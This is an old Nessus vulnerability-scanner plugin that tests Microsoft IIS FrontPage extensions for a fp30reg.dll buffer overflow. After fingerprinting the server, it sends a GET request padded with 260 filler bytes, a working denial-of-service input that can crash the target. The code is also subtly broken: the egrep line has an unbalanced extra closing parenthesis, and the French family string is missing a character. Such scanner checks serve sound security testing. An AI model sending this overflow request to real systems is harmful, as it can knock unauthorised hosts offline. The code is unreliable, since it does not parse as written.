#
# This script was written by John Lampe <j_lampe@bellsouth.net>
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10699);

 name["english"] = "IIS FrontPage DoS II";
 script_name(english:name["english"]);

 desc["english"] = "
Microsoft IIS, running Frontpage extensions, is
vulnerable to a remote buffer attack


Solution: See http://www.nsfocus.com/english/homepage/sa01-03.htm 
for more information

Risk factor : High";

 script_description(english:desc["english"]);

 summary["english"] = "Attempts to overflow the fp30reg.dll dll";
 script_summary(english:summary["english"]);
 script_category(ACT_DENIAL);
 script_copyright(english:"This script is Copyright (C) 2001 John Lampe");
 family["english"] = "Gain root remotely";
 family["francais"] = "Passer root  distance";
 script_family(english:family["english"],
               francais:family["francais"]);
 script_dependencie("find_service.nes", "http_version.nasl");
 script_require_ports("Services/www", 80);
 script_require_keys("www/iis");
 exit(0);
}

#
# The script code starts here
#

port=get_kb_item("Services/www");
if(!port)port=80;

#Make sure app is alive...and running IIS
mystring = string("HEAD / HTTP/1.0\r\n\r\n");
if(get_port_state(port)) {
    mysoc = open_sock_tcp(port);
    send(socket:mysoc, data:mystring);
    incoming = recv(socket:mysoc, length:1024);
    find_ms = egrep(pattern:"^Server.*IIS.*" , string:incoming);
    if((!incoming) || (!find_ms)) {exit(0);}
    close(mysoc);
}


mystring= string ("GET /_vti_bin/_vti_aut/fp30reg.dll?" , crap(260), "
HTTP/1.0\r\n\r\n");
if(get_port_state(port)) {
        mysoc = open_sock_tcp(port);
        if(mysoc) {
            send(socket:mysoc, data:mystring);
            incoming=recv(socket:mysoc, length:4096);
            match = egrep(pattern:".*The remote procedure call failed*" ,
string:incoming));
            if(match) {security_hole(port);}
            close (mysoc);
        }
}
